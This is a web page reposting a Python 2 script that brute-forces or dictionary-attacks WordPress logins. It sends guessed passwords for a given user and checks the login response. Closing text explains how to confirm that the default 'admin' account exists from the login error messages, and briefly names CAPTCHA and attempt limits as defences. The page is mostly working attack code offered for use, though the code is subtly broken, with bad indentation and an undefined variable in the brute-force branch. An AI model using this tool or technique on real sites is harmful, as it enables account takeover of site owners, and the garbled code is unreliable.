Wordpress BruteForcer Attacked | www.pemula.info

1. ############## Source code #####################
2. #!usr/bin/python
3. # Flaw found on Wordpress
4. # that allow Dictionnary & Bruteforce attack
5. # Greetz goes to : NeoMorphS, Tiky
6. # Vendor : http://wordpress.org/
7. # Found by : Kad (kadfrox@gmail.com / #kadaj-diabolik@hotmail.fr)
8. import urllib , urllib2, sys, string
9. tab = "%s%s%s"%( string.ascii_letters, string.punctuation, string.digits )
10. tab = [  i for i in tab ]
11. def node( table, parent, size ):
12.     if size == 0:
13.         pass
14.     else:
15.         for c in table:
16.             string = "%s%s"%( parent, c )
17.                         data = {'log': sys.argv[2],
18.                                 'pwd': string}
19.                         print "[+] Testing : "+string
20.                         request = urllib2.Request(server, urllib.urlencode(data))
21.                         f = urllib2.urlopen(request).read()
22.                         if not "Incorrect password.</div>" in f: print "[!] Password is : "+mot ; break
23.             node( table, string, size-1 )
24.  
25. def bruteforce( table, size ):
26.     for c in table:
27.         node( table, c, size-1 )
28.        
29. if (len(sys.argv) < 3):
30.     print "Usage : float.py <server> <user> <choice> <dico-characters>"
31.     print "\nDefault: User is 'admin'"
32.     print "Choice : 1} Dictionnary Attack, use dictionnary file"
33.     print "         2} Bruteforce Attack, use number of character for password"
34.    
35. else:
36.     server = sys.argv[1]
37.     if sys.argv[3] == "1":
38.     a , b = open(sys.argv[4],'r') , 0
39.     for lines in a: b = b + 1
40.     a.seek(0)  
41.     c = 0
42.     while (c < b):
43.         mot = a.readline().rstrip()
44.         data = {'log': sys.argv[2],
45.                 'pwd': mot}
46.         print "[+] Testing : "+mot
47.         request = urllib2.Request(server, urllib.urlencode(data))
48.         f = urllib2.urlopen(request).read()
49.         if not "Incorrect password.</div>" in f: print "[!] Password is : "+mot ; break
50.         else: c = c + 1 ; pass
51.     if sys.argv[3] == "2":
52.     print "[-] Server is : "+server
53.     print "[-] User is : "+sys.argv[2]
54.     print "[-] Number of characters are : "+sys.argv[4]
55.         number = int(sys.argv[4])
56.         bruteforce( tab, number )
57. ############## Source code #####################
58.  
59. The problem is : many time, the default user who is created is : admin, then you can try to crack the password, to stop that, you can use image confirmation or a limit for the connection (for example, only 5 tests).
60.  
61. To know if "admin" is the default user, you can try to go to the login page : http://site.com/wp-login.php and you try ; login : admin, pass : test (or anything else).
62.  
63. if "Wrong password" is printed on the page, the default user is admin, but if there is : "Wrong Username" then it's not the default password ;)
64.  
65. Kad'